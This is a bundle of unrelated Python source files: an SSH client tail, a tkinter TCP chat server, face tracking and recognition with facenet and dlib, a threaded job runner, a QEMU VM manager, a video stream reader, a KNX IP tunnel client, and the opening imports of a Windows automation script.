username, hostname, purpose)
attempts = 0
password = None
key = client.get_user_key()
while True:
try:
client.connect(hostname, port, username=username,
password=password, pkey=key,
allow_agent=options.allow_agent)
break
except paramiko.AuthenticationException as e:
if attempts == 3 or not sys.stdin.isatty():
logging.error('Too many authentication failures for %s' %
username)
sys.exit(1)
attempts += 1
password = getpass.getpass("%s@%s's password: " %
(username, hostname))
except paramiko.SSHException as e:
logging.error('Error connecting to server: %s' % e)
sys.exit(1)
except Exception as e:
logging.error('Unknown exception during connect: %s (%s)' %
(e, type(e)))
sys.exit(1)
transport = client.get_transport()
channel = transport.open_session()
if sys.platform in ('cygwin', 'win32'):
debug('!!! Using WindowsHandler')
handler = WindowsHandler(channel)
else:
debug('!!! Using PosixHandler')
handler = PosixHandler(channel)
if options.subsystem == 'sftp':
debug('!!! Invoking sftp subsystem')
channel.invoke_subsystem('sftp')
handler.transfer()
elif command:
debug('!!! Sending command %s', command)
channel.exec_command(' '.join(command))
handler.transfer()
else:
debug('!!! Opening shell')
channel.get_pty()
channel.invoke_shell()
handler.shell()
debug('!!! Done')
status = channel.recv_exit_status()
client.close()
return status
if __name__ == '__main__':
main()
# ... with blackjack, and hookers.
|
TCPserver.py
|
from socket import *
import tkinter as tk
import tkinter.scrolledtext as tst
import time
import tkinter.messagebox
import threading
class Application(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self,master)
self.grid()
self.createWidgets()
def createWidgets(self):
#显示聊天窗口
self.textEdit=tst.ScrolledText(self,width=50,height=15)
self.textEdit.grid(row=0,column=0,rowspan=1,columnspan=4)
#定义标签,改变字体颜色
self.textEdit.tag_config('server',foreground='red')
self.textEdit.tag_config('guest',foreground='blue')
#编辑窗口
self.inputText=tk.Text(self,width=40,height=5)
self.inputText.grid(row=1,column=0,columnspan=1)
#定义快捷键,按下回车即可发送消息
self.inputText.bind("<KeyPress-Return>",self.textSendReturn)
#发送按钮
self.btnSend=tk.Button(self,text='send',command=self.textSend)
self.btnSend.grid(row=1,column=3)
#开启一个线程用于接收消息并显示在聊天窗口
t=threading.Thread(target=self.getInfo)
t.start()
def textSend(self):
#获取Text的所有内容
str=self.inputText.get('1.0','end-1c')
if str!="" :
#显示发送时间和发送消息
timemsg='服务端'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
self.textEdit.config(state='normal')
self.textEdit.insert(tk.END,timemsg,'server')
self.textEdit.insert(tk.END,str+'\n')
#将滚动条拉到最后显示最新消息
self.textEdit.see(tk.END)
self.textEdit.config(state='disabled')
self.inputText.delete(0.0,tk.END) #删除输入框的内容
#发送数据到服务端
sendMessage=bytes(str,encoding='utf8')
#发送输入的数据,与UDP有点不同,使用的是send方法,不需要指定服务器和端口,因为已经建立了一条tcp连接
connectionSocket.send(sendMessage)
else:
tk.messagebox.showinfo('警告',"不能发送空白信息!")
def getInfo(self):
while True:
recMsg=connectionSocket.recv(1024).decode("utf-8")+'\n'
revTime='客户端'+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
#通过设置state属性设置textEdit可编辑
self.textEdit.config(state='normal')
self.textEdit.insert(tk.END,revTime,'guest')
self.textEdit.insert(tk.END,recMsg)
#将滚动条拉到最后显示最新消息
self.textEdit.see(tk.END)
#通过设置state属性设置textEdit不可编辑
self.textEdit.config(state='disabled')
def textSendReturn(self,event):
if event.keysym=="Return":
self.textSend()
root=tk.Tk()
root.title('服务端')
#指定服务器使用的端口
serverPort=12000
serverSocket=socket(AF_INET,SOCK_STREAM)
#绑定端口
serverSocket.bind(('',serverPort))
#定义最大连接数
serverSocket.listen(1)
print('等待连接....')
#接受请求则建立一个连接
connectionSocket,addr=serverSocket.accept()
print('一个连接')
app=Application(master=root)
app.mainloop()
|
detect_tracking_recognize.py
|
# Copyright (c) 2017 InspiRED Robotics
# The project was based on David Sandberg's implementation of facenet
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import facenet
import align.detect_face
import random
from time import sleep
import math
from sklearn.externals import joblib
import time
import dlib
import imageio
from multiprocessing import Process, Pipe, Lock
import threading
def main(args):
# Store some git revision info in a text file in the log directory
# facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))
detector = dlib.get_frontal_face_detector()
print('Creating networks and loading parameters')
# Load extracting feature model
print('Model directory: %s' % args.model_dir)
#Video information
trackers = []
positions = dlib.rectangles()
tracker = dlib.correlation_tracker()
vid = imageio.get_reader(args.input_video, 'ffmpeg')
win = dlib.image_window()
nums=range(40,vid.get_length())
#Multi Process Info
proc = None
nrof_person = 0
parent_conn, child_conn = Pipe()
#Detection Interval
interval = 20
##SVM model to predict images
svm_model = joblib.load(os.path.join(os.path.expanduser(args.svm_model_dir),'model.pkl'))
person_label = []
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
#Loading extracting feature network
print('Loading network used to extract features')
meta_file, ckpt_file = facenet.get_model_filenames(os.path.expanduser(args.model_dir))
print('Metagraph file: %s' % meta_file)
print('Checkpoint file: %s' % ckpt_file)
facenet.load_model(args.model_dir, meta_file, ckpt_file)
# Get input and output tensors
images_placeholder = tf.get_default_graph().get_tensor_by_name("input:0")
embeddings = tf.get_default_graph().get_tensor_by_name("embeddings:0")
phase_train_placeholder = tf.get_default_graph().get_tensor_by_name("phase_train:0")
image_size = images_placeholder.get_shape()[1]
embedding_size = embeddings.get_shape()[1]
t=time.time()
for num in nums:
print("Processing Frame {}".format(num))
time.sleep(0.01)
img = np.array(vid.get_data(num),dtype=np.uint8)
if num%interval == 0:
if num+interval >= nums[-1]:
break
img_next = np.array(vid.get_data(num+interval),dtype=np.uint8)
if proc != None:
dets = parent_conn.recv()
proc.join()
if len(dets) != nrof_person:
update_tracker(trackers, dets, img)
image_sets = crop_image(img, dets, args)
print(np.shape(image_sets))
feed_dict = { images_placeholder:image_sets, phase_train_placeholder:False }
person_label = predicted_label(sess, feed_dict, embeddings, svm_model)
# t = threading.Thread(target=predicted_label, args = (sess, feed_dict, embeddings, svm_model))
# t.daemon = True
# t.start()
nrof_person = len(dets)
proc = Process(target=detect_resize, args=(child_conn, img_next, detector, ))
proc.start()
# scaled, dets = detect_resize('d', img, detector, args, CROP_IMAGE=True)
# update_tracker(trackers, dets, img)
else:
# Else we just attempt to track from the previous frame
positions.clear()
if len(trackers) > 0:
for tracker in trackers:
tracker.update(img)
d=tracker.get_position()
positions.append(dlib.rectangle(int(d.left()), int(d.top()), int(d.right()), int(d.bottom())))
win.clear_overlay()
win.set_image(img)
win.add_overlay(positions, color=dlib.rgb_pixel(0,254,0))
win.set_title('-'.join(person_label))
# dlib.hit_enter_to_continue()
proc.join()
# print('Total number of images: %d' % nrof_images_total)
# print('Number of successfully aligned images: %d' % nrof_successfully_aligned)
# #Extracting features
# print('\n\nStarting to extract features')
# print('Crop pics spend %.3f seconds'% (time.time()-t))
# # Run forward pass to calculate embeddings
# t=time.time()
# print('Extract feature spend %.3f seconds'% (time.time()-t))
# ##Run SVM to predict images
# predicted_label = svm_model.predict(emb_array)
# print('Classifier spend %.3f seconds'% (time.time()-t))
# print('Predicted Persons')
# print(predicted_label)
# if not os.path.isdir(args.feature_dir): # Create the feature directory if it doesn't exist
# os.makedirs(args.feature_dir)
# file_name = os.path.join(os.path.expanduser(args.feature_dir),args.feature_name)
# np.savez(file_name, emb_array=emb_array, label=label_list)
def update_tracker(trackers, dets, img):
trackers[:] = []
for i, det in enumerate(dets):
trackers.append(dlib.correlation_tracker())
trackers[i].start_track(img, det)
def predicted_label(sess, feed_dict, embeddings, svm_model):
# Predicting people label
# feed_dict = { images_placeholder:[scaled], phase_train_placeholder:False }
t = time.time()
emb_array = sess.run(embeddings, feed_dict=feed_dict)
person_label = svm_model.predict(emb_array)
print('Predicted Persons, spending time ', time.time()-t)
print(person_label)
return person_label
def detect_resize(conn, img, detector):
if img.ndim<2:
print('Unable to align "%s"' % image_path)
return
if img.ndim == 2:
img = facenet.to_rgb(img)
img = img[:,:,0:3]
dets = detector(img, 1)
conn.send(dets)
def crop_image(img, dets, args):
bounding_boxes = []
for i, d in enumerate(dets):
bounding_boxes.append([d.left(), d.top(), d.right(), d.bottom()])
bounding_boxes=np.asarray(bounding_boxes)
nrof_faces = bounding_boxes.shape[0]
if nrof_faces < 0:
return
image_sets = []
img_size = np.asarray(img.shape)[0:2]
bb = np.zeros(4, dtype=np.int32)
for i in xrange(nrof_faces):
bb[0] = np.maximum(bounding_boxes[i,0]-args.margin/2, 0)
bb[1] = np.maximum(bounding_boxes[i,1]-args.margin/2, 0)
bb[2] = np.minimum(bounding_boxes[i,2]+args.margin/2, img_size[1])
bb[3] = np.minimum(bounding_boxes[i,3]+args.margin/2, img_size[0])
cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]
scaled = misc.imresize(cropped, (args.image_size, args.image_size), interp='bilinear')
scaled=facenet.pre_precoss_data(scaled, False, False)
image_sets.append(scaled)
return image_sets
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--input_video', type=str, help='Path to video.', default='/cs/vml2/xca64/GitHub/pics/me.mp4')
parser.add_argument('--image_size', type=int,
help='Image size (height, width) in pixels.', default=182)
parser.add_argument('--margin', type=int,
help='Margin for the crop around the bounding box (height, width) in pixels.', default=44)
parser.add_argument('--gpu_memory_fraction', type=float,
help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)
parser.add_argument('--model_dir', type=str,
help='Directory containing the metagraph (.meta) file and the checkpoint (ckpt) file containing model parameters')
parser.add_argument('--svm_model_dir', type=str, default='~/remote/models/svm',
help='Path to save the trained model')
return parser.parse_args(argv)
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
print('END')
|
mainparallel.py
|
import pandas as pd
from threading import Thread
from queue import Queue
import os
def runXsec(index, row):
print("\n \n \n ************Starting Job*****************\n \n \n")
if row['ranXSec'] == 0:
print("calculating xsections for: n1={}, n2={}, n3={}, j0= {}".format(row['n1'], row['n2'], row['n3'], row['j0']))
os.system('./xSection/calcXSection.sh {} {} {} {}'.format(row['n1'], row['n2'], row['n3'], row['j0']))
data.at[index,'ranXSec'] = 1
data.to_csv('input.csv',index=False)
else:
print("already calculated xsections for: n1={}, n2={}, n3={}, j0= {}".format(row['n1'], row['n2'], row['n3'], row['j0']))
return None
data = pd.read_csv('input.csv')
#Define jobs
que =Queue()
def worker():
while True:
index, row = que.get()
runXsec(index, row)
que.task_done()
N_cores=10
for i in range(N_cores):
thread=Thread(target=worker)
#thread.deamon= True
thread.start()
for index, row in data.iterrows():
#runXsec(index, row)
que.put((index, row))
que.join()
|
transient.py
|
from . import checked_threading
from . import configuration
from . import editor
from . import qemu
from . import image
from . import utils
from . import ssh
from . import sshfs
from . import static
import contextlib
import enum
import glob
import logging
import os
import pwd
import signal
import subprocess
import tempfile
import uuid
from typing import (
cast,
Iterator,
Optional,
Sequence,
List,
Dict,
Any,
Union,
Tuple,
TYPE_CHECKING,
)
# _Environ is declared as generic in stubs but not at runtime. This makes it
# non-subscriptable and will result in a runtime error. According to the
# MyPy documentation, we can bypass this: https://tinyurl.com/snqhqbr
if TYPE_CHECKING:
Environ = os._Environ[str]
else:
Environ = os._Environ
MAX_CONCURRENT_SSHFS = 7
@enum.unique
class TransientVmState(enum.Enum):
WAITING = (1,)
RUNNING = (2,)
FINISHED = (3,)
class TransientVm:
store: image.ImageStore
config: configuration.Config
vm_images: Sequence[image.BaseImageInfo]
ssh_config: Optional[ssh.SshConfig]
qemu_runner: Optional[qemu.QemuRunner]
qemu_should_die: bool
def __init__(self, config: configuration.Config, store: image.ImageStore) -> None:
self.store = store
self.config = config
self.vm_images = []
self.ssh_config = None
self.qemu_runner = None
self.qemu_should_die = False
self.name = self.config.name or self.__generate_tmp_name()
self.state = TransientVmState.WAITING
def __generate_tmp_name(self) -> str:
return str(uuid.uuid4())
def __create_images(self, names: List[str]) -> List[image.FrontendImageInfo]:
return [
self.store.create_vm_image(image_name, self.name, idx)
for idx, image_name in enumerate(names)
]
def __use_backend_images(self, names: List[str]) -> List[image.BackendImageInfo]:
"""Ensure the backend images are download for each image spec in 'names'"""
return [self.store.retrieve_image(name) for name in names]
def __needs_ssh(self) -> bool:
return (
self.config.ssh_console is True
or self.config.ssh_command is not None
or self.config.ssh_with_serial is True
or len(self.config.shared_folder) > 0
)
def __needs_ssh_console(self) -> bool:
return (
self.config.ssh_console is True
or self.config.ssh_with_serial is True
or self.config.ssh_command is not None
)
def __is_stateless(self) -> bool:
"""Checks if the VM does not require any persistent storage on disk"""
return (
not self.__needs_to_copy_out_files_after_running()
and not self.__needs_to_copy_in_files_before_running()
and self.config.name is None
)
def __do_copy_command(self, cmd: List[str], environment: Environ) -> None:
cmd_name = cmd[0]
try:
handle = subprocess.Popen(
cmd,
env=environment,
stdin=subprocess.DEVNULL,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
_, raw_stderr = handle.communicate(timeout=self.config.copy_timeout)
if handle.poll() == 0:
return
except subprocess.TimeoutExpired:
handle.terminate()
_, raw_stderr = handle.communicate()
logging.error(
f"{cmd_name} timed out after {self.config.copy_timeout} seconds"
)
stderr = raw_stderr.decode("utf-8").strip()
raise RuntimeError(f"{cmd_name} failed: {stderr}")
def __needs_to_copy_in_files_before_running(self) -> bool:
"""Checks if at least one file or directory on the host needs to be copied into the VM
before starting the VM
"""
return len(self.config.copy_in_before) > 0
def __copy_in_files(self) -> None:
"""Copies the given files or directories (located on the host) into the VM"""
path_mappings = self.config.copy_in_before
for path_mapping in path_mappings:
self.__copy_in(path_mapping)
def __copy_in(self, path_mapping: str) -> None:
"""Copies the given file or directory (located on the host) into the VM"""
try:
host_path, vm_absolute_path = path_mapping.split(":")
except ValueError:
raise RuntimeError(
f"Invalid file mapping: {path_mapping}."
+ " -copy-in-before must be (path/on/host:/absolute/path/on/guest)"
)
if not os.path.exists(host_path):
raise RuntimeError(f"Host path does not exists: {host_path}")
if not vm_absolute_path.startswith("/"):
raise RuntimeError(f"Absolute path for guest required: {vm_absolute_path}")
for vm_image in self.vm_images:
assert isinstance(vm_image, image.FrontendImageInfo)
assert vm_image.backend is not None
logging.info(
f"Copying from '{host_path}' to '{vm_image.backend.identifier}:{vm_absolute_path}'"
)
with editor.ImageEditor(self.config, vm_image.path) as edit:
edit.copy_in(host_path, vm_absolute_path)
def __needs_to_copy_out_files_after_running(self) -> bool:
"""Checks if at least one directory on the VM needs to be copied out
to the host after stopping the VM
"""
return len(self.config.copy_out_after) > 0
def __copy_out_files(self) -> None:
"""Copies the given files or directories (located on the guest) onto the host"""
path_mappings = self.config.copy_out_after
for path_mapping in path_mappings:
self.__copy_out(path_mapping)
def __copy_out(self, path_mapping: str) -> None:
"""Copies the given file or directory (located on the guest) onto the host"""
try:
vm_absolute_path, host_path = path_mapping.split(":")
except ValueError:
raise RuntimeError(
f"Invalid file mapping: {path_mapping}."
+ " -copy-out-after must be (/absolute/path/on/guest:path/on/host)"
)
if not os.path.isdir(host_path):
raise RuntimeError(f"Host path does not exist: {host_path}")
if not vm_absolute_path.startswith("/"):
raise RuntimeError(f"Absolute path for guest required: {vm_absolute_path}")
for vm_image in self.vm_images:
assert isinstance(vm_image, image.FrontendImageInfo)
assert vm_image.backend is not None
logging.info(
f"Copying from '{vm_image.backend.identifier}:{vm_absolute_path}' to '{host_path}'"
)
with editor.ImageEditor(self.config, vm_image.path) as edit:
edit.copy_out(vm_absolute_path, host_path)
def __qemu_added_args(self) -> List[str]:
new_args = ["-name", self.name]
if self.__is_stateless():
new_args.append("-snapshot")
for image in self.vm_images:
new_args.extend(["-drive", f"file={image.path}"])
if self.__needs_ssh():
if self.__needs_ssh_console():
new_args.extend(["-serial", "stdio", "-display", "none"])
if self.config.ssh_port is None:
ssh_port = utils.allocate_random_port()
else:
ssh_port = self.config.ssh_port
self.ssh_config = ssh.SshConfig(
host="127.0.0.1",
port=ssh_port,
user=self.config.ssh_user,
ssh_bin_name=self.config.ssh_bin_name,
)
# the random localhost port or the user provided port to guest port 22
new_args.extend(
[
"-netdev",
f"user,id=transient-sshdev,hostfwd=tcp::{ssh_port}-:22",
"-device",
"e1000,netdev=transient-sshdev",
]
)
return new_args
def __connect_ssh(self) -> int:
assert self.ssh_config is not None
assert self.qemu_runner is not None
client = ssh.SshClient(config=self.ssh_config, command=self.config.ssh_command)
conn = client.connect_stdout(timeout=self.config.ssh_timeout)
conn.wait()
return conn.returncode
def __current_user(self) -> str:
return pwd.getpwuid(os.getuid()).pw_name
def __qemu_sigchld_handler(self, sig: int, frame: Any) -> None:
# We register this signal handler after the QEMU start, so these must not be None
assert self.qemu_runner is not None
assert self.qemu_runner.proc_handle is not None
# Once we no longer have a QEMU processes (i.e., the VM is 'finished'), it
# is an error to waitpid on the QEMU pid. However, we may still receive
# SIGCHLD during image cleanup for example (from the qemu-img calls). So,
# just return in this case.
if self.state == TransientVmState.FINISHED:
return
# We are only interested in the death of the QEMU child
pid, exit_indicator = os.waitpid(self.qemu_runner.proc_handle.pid, os.WNOHANG)
if (pid, exit_indicator) == (0, 0):
# In this case, the processes that sent SIGCHLD was not QEMU
return
else:
# According to the python docs, the exit_indicator is "a 16-bit number,
# whose low byte is the signal number that killed the process, and whose
# high byte is the exit status (if the signal number is zero); the high
# bit of the low byte is set if a core file was produced."
#
# Therefore, we check if the least significant 7 bits are unset, and if
# so, return the high byte. Otherwise, just return 1
signal_number = exit_indicator & 0x7F
if signal_number != 0:
exit_status = 1
else:
exit_status = exit_indicator >> 8
if self.qemu_should_die is True:
# We have reached a state where QEMU should be exiting (e.g., we have sent
# the system_shutdown QMP message). So don't error here.
logging.debug("QEMU process died as expected")
else:
logging.error("QEMU Process has died")
# NOTE: this will raise an exception if the exit_status is non-zero.
# otherwise, it will just return None. Because this is a signal handler,
# returning from this function will not cause the 'run' call to exit.
self.__post_run(exit_status)
def __post_run(self, returncode: int) -> None:
self.state = TransientVmState.FINISHED
if self.__needs_to_copy_out_files_after_running():
self.__copy_out_files()
# If the config name is None, this is a temporary VM,
# so remove any generated frontend images. However, if the
# VM is _totally_ stateless, there is nothing to remove
if self.config.name is None and not self.__is_stateless():
logging.info("Cleaning up temporary vm images")
for image in self.vm_images:
self.store.delete_image(image)
if returncode != 0:
logging.debug(f"VM exited with non-zero code: {returncode}")
raise utils.TransientProcessError(returncode=returncode)
return None
def run(self) -> None:
self.state = TransientVmState.RUNNING
if not self.__is_stateless():
# First, download and setup any required disks
self.vm_images = self.__create_images(self.config.image)
else:
# If the VM is completely stateless, we don't need to make our
# own frontend images, because we will be using the '-snapshot'
# feature to effectively do that. So just ensure the backend
# images have been downloaded.
self.vm_images = self.__use_backend_images(self.config.image)
if self.__needs_to_copy_in_files_before_running():
self.__copy_in_files()
if self.config.prepare_only is True:
return self.__post_run(0)
print("Finished preparation. Starting virtual machine")
added_qemu_args = self.__qemu_added_args()
full_qemu_args = added_qemu_args + self.config.qemu_args
# If we are using the SSH console, we need to do _something_ with QEMU output.
qemu_quiet, qemu_interactive = False, True
if self.__needs_ssh_console():
qemu_interactive = False
qemu_quiet = not self.config.ssh_with_serial
# Note that we must _not_ use QMP if we aren't using the SSH connection, because
# passing the `-qmp` arg causes QEMU to terminate on SIGINT, even when in
# `-nographic` mode, which is very surprising.
self.qemu_runner = qemu.QemuRunner(
full_qemu_args,
quiet=qemu_quiet,
interactive=qemu_interactive,
qmp_connectable=self.__needs_ssh_console(),
)
qemu_proc = self.qemu_runner.start()
# Register the exit signal handler for the qemu subprocess, then check if it
# had already died, just in case.
signal.signal(signal.SIGCHLD, self.__qemu_sigchld_handler)
qemu_returncode = qemu_proc.poll()
if qemu_returncode is not None:
logging.error("QEMU Process has died. Exiting")
return self.__post_run(qemu_returncode)
sshfs_threads = []
for shared_spec in self.config.shared_folder:
assert self.ssh_config is not None
local, remote = shared_spec.split(":")
# The user almost certainly doesn't intend to pass a relative path,
# so make it absolute
absolute_local_path = os.path.abspath(local)
sshfs_kwargs = {
"connect_timeout": self.config.ssh_timeout,
"ssh_config": self.ssh_config,
"local_dir": absolute_local_path,
"remote_dir": remote,
"local_user": self.__current_user(),
}
# Slamming the server with 20 connections at once is a good way to break things:
if len(sshfs_threads) > MAX_CONCURRENT_SSHFS:
sshfs_threads.pop(0).join()
sshfs_threads.append(
checked_threading.Thread(target=sshfs.do_sshfs_mount, kwargs=sshfs_kwargs)
)
sshfs_threads[-1].start()
for sshfs_thread in sshfs_threads:
sshfs_thread.join()
if self.__needs_ssh_console():
# Now wait until the QMP connection is established (this should be very fast).
assert self.qemu_runner.qmp_client is not None
self.qemu_runner.qmp_client.connect(self.config.qmp_timeout)
# Note that we always return the SSH exit code, even if the guest failed to
# shut down. This ensures the shutdown_timeout=0 case is handled as expected.
# (i.e., it returns the SSH code instead of a QEMU error)
returncode = self.__connect_ssh()
# In theory, we could get SIGCHLD from the QEMU process before getting or
# processing the SHUTDOWN event. So set this flag so we don't do the
# SIGCHLD exit.
self.qemu_should_die = True
try:
# Wait a bit for the guest to finish the shutdown and QEMU to exit
self.qemu_runner.shutdown(timeout=self.config.shutdown_timeout)
except subprocess.TimeoutExpired:
# if the timeout == 0, then the user expects the guest to not actually
# shutdown, so don't show an error here.
if self.config.shutdown_timeout > 0:
logging.error(
"Timeout expired while waiting for guest to shutdown (timeout={})".format(
self.config.shutdown_timeout
)
)
# If we didn't reach the expected shutdown, this will terminte
# the VM. Otherwise, this does nothing.
self.qemu_runner.terminate()
# Note that we always return the SSH exit code, even if the guest failed to
# shut down. This ensures the shutdown_timeout=0 case is handled as expected.
# (i.e., it returns the SSH code instead of a QEMU error)
return self.__post_run(returncode)
else:
returncode = self.qemu_runner.wait()
return self.__post_run(returncode)
|
customFVS.py
|
# import the necessary packages
from threading import Thread
import cv2
import time
class FileVideoStream:
def __init__(self, path, transform=None, queue_size=16, num_queues=1, queue_type="Q"):
self.stream = cv2.VideoCapture(path)
self.stopped = False
self.transform = transform
self.num_queues = num_queues
self.queue_type = queue_type
self.qlist = []
if self.queue_type == "mQ":
from multiprocessing import Queue
else:
from queue import Queue
for _ in range(self.num_queues):
q = Queue(maxsize=queue_size)
self.qlist.append(q)
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
def start(self):
self.thread.start()
return self
def update(self):
while True:
if self.stopped:
break
if not self.qlist[0].full():
(grabbed, frame) = self.stream.read()
if not grabbed:
self.stopped = True
if self.transform:
frame = self.transform(frame)
for i in range(self.num_queues):
self.qlist[i].put(frame)
else:
time.sleep(0.1)
self.stream.release()
def read(self):
return self.qlist[0].get()
def running(self):
return self.more() or not self.stopped
def more(self):
tries = 0
while self.qlist[0].qsize() == 0 and not self.stopped and tries < 5:
time.sleep(0.1)
tries += 1
return self.qlist[0].qsize() > 0
def stop(self):
self.stopped = True
self.thread.join()
|
ip.py
|
import socket
import threading
import logging
import socketserver
import queue
import time
from .core import KNXIPFrame,KNXTunnelingRequest,CEMIMessage
from . import util
logger = logging.getLogger(__name__)
class KNXIPTunnel(object):
# TODO: implement a control server
# control_server = None
data_server = None
control_socket = None
channel = 0
seq = 0
def __init__(self, ip, port, callback=None):
self.remote_ip = ip
self.remote_port = port
self.discovery_port = None
self.data_port = None
self.result_addr_dict = {}
self.result_dict = {}
self.unack_queue = queue.Queue()
self.callback = callback
self.read_timeout = 0.5
# Find my own IP
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((self.remote_ip,self.remote_port))
self.local_ip=s.getsockname()[0]
def connect(self):
"""
Connect to the KNX interface
"""
# create the data server
if self.data_server:
logger.info("Data server already running, not starting again")
else:
self.data_server = DataServer((self.local_ip, 0), DataRequestHandler)
self.data_server.tunnel = self
_ip, self.data_port = self.data_server.server_address
data_server_thread = threading.Thread(target=self.data_server.serve_forever)
data_server_thread.daemon = True
data_server_thread.start()
# initiate tunneling
self._initiate_tunneling()
def send_tunnelling_request(self, cemi):
"""
Send a request through the ip tunnel
Parameters
----------
cemi : knxpy.core.CEMIMessage
message as a cemi object
"""
f = KNXIPFrame(KNXIPFrame.TUNNELING_REQUEST)
b = bytearray([0x04,self.channel,self.seq,0x00]) # Connection header see KNXnet/IP 4.4.6 TUNNELLING_REQUEST
if (self.seq < 0xff):
self.seq += 1
else:
self.seq = 0
b.extend(cemi.to_body())
f.body=b
self.data_server.socket.sendto(f.to_frame(), (self.remote_ip, self.remote_port))
# TODO: wait for ack
def group_read(self, ga, dpt=None):
"""
Reads a value from the KNX bus
Parameters
----------
ga : string or int
the group address to write to as a string (e.g. '1/1/64') or an integer (0-65535)
dpt : string
the data point type of the group address, used to decode the result
Returns
-------
res :
the decoded value on the KNX bus
Notes
-----
This is still tricky, not all requests are answered and fast successive
read calls can lead to wrong answers
"""
if type(ga) is str:
addr = util.encode_ga(ga)
else:
addr = ga
self.result_addr_dict[addr] = True
cemi = CEMIMessage()
cemi.init_group_read(addr)
self.send_tunnelling_request(cemi)
# Wait for the result
res = None
starttime = time.time()
runtime = 0
while res is None and runtime < self.read_timeout:
if addr in self.result_dict:
res = self.result_dict[addr]
del self.result_dict[addr]
time.sleep(0.01)
runtime = time.time()-starttime
del self.result_addr_dict[addr]
if not res is None and not dpt is None:
res = util.decode_dpt(res,dpt)
return res
def group_write(self, ga, data, dpt=None):
"""
Writes a value to the KNX bus
Parameters
----------
ga : string or int
the group address to write to as a string (e.g. '1/1/64') or an integer (0-65535)
dpt : string
the data point type of the group address, used to encode the data
"""
if type(ga) is str:
addr = util.encode_ga(ga)
else:
addr = ga
if not dpt is None:
util.encode_dpt(data,dpt)
cemi = CEMIMessage()
cemi.init_group_write(addr, data)
self.send_tunnelling_request(cemi)
def _initiate_tunneling(self):
"""
Initiate the tunneling
"""
self.control_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.control_socket.bind((self.local_ip, 0))
# Connect packet
p=bytearray()
p.extend([0x06,0x10]) # header size, protocol version
p.extend(util.int_to_array(KNXIPFrame.CONNECT_REQUEST , 2))
p.extend([0x00,0x1a]) # total length = 24 octet
# Control endpoint
p.extend([0x08,0x01]) # length 8 bytes, UPD
_ip,port=self.control_socket.getsockname()
p.extend(util.ip_to_array(self.local_ip))
p.extend(util.int_to_array(port, 2))
# Data endpoint
p.extend([0x08,0x01]) # length 8 bytes, UPD
p.extend(util.ip_to_array(self.local_ip))
p.extend(util.int_to_array(self.data_port, 2))
#
p.extend([0x04,0x04,0x02,0x00])
self.control_socket.sendto(p, (self.remote_ip, self.remote_port))
try:
self.control_socket.settimeout(1)
received = bytearray(self.control_socket.recv(1024))
except:
raise Exception('Could not connect to knx gateway {}:{}'.format(self.remote_ip, self.remote_port))
else:
# Check if the response is an TUNNELING ACK
r_sid = received[2]*256+received[3]
if r_sid == KNXIPFrame.CONNECT_RESPONSE:
self.channel = received[6]
logger.debug("Connected KNX IP tunnel (Channel: {})".format(self.channel,self.seq))
# TODO: parse the other parts of the response
else:
raise Exception("Could not initiate tunnel connection, STI = {}".format(r_sid))
class DataRequestHandler(socketserver.BaseRequestHandler):
"""
Class handling messages from the KNX bus
"""
def handle(self):
data = self.request[0]
socket = self.request[1]
f = KNXIPFrame.from_frame(data)
if f.service_type_id == KNXIPFrame.TUNNELING_REQUEST:
req = KNXTunnelingRequest.from_body(f.body)
msg = CEMIMessage.from_body(req.cEmi)
send_ack = False
# print(msg)
tunnel = self.server.tunnel
if msg.code == 0x29:
# LData.req
send_ack = True
elif msg.code == 0x2e:
# LData.con
send_ack = True
else:
problem="Unimplemented cEMI message code {}".format(msg.code)
logger.error(problem)
raise Exception(problem)
logger.debug("Received KNX message {}".format(msg))
# Put RESPONSES into the result dict
if (msg.cmd == CEMIMessage.CMD_GROUP_RESPONSE) and msg.dst_addr in tunnel.result_addr_dict:
tunnel.result_dict[msg.dst_addr] = msg.data
# execute callback
if not tunnel.callback is None:
try:
tunnel.callback(msg)
except Exception as e:
logger.error("Error encountered durring callback execution: {}".format(e))
if send_ack:
bodyack = bytearray([0x04, req.channel, req.seq, KNXIPFrame.E_NO_ERROR])
ack = KNXIPFrame(KNXIPFrame.TUNNELLING_ACK)
ack.body = bodyack
socket.sendto(ack.to_frame(), self.client_address)
class DataServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
|
rhba_utils.py
|
import os
import cv2
import time
import math
import ctypes
import random
import win32ui
import win32gui
import warnings
import win32con
import threading
import subprocess
import pytesseract
import numpy as np
import pydirectinput
from fuzzywuzzy import process
from custom_input import CustomInput
from win32api import GetSystemMetrics
os.chdir(os.path.dirname(os.path.abspath(__file__)))
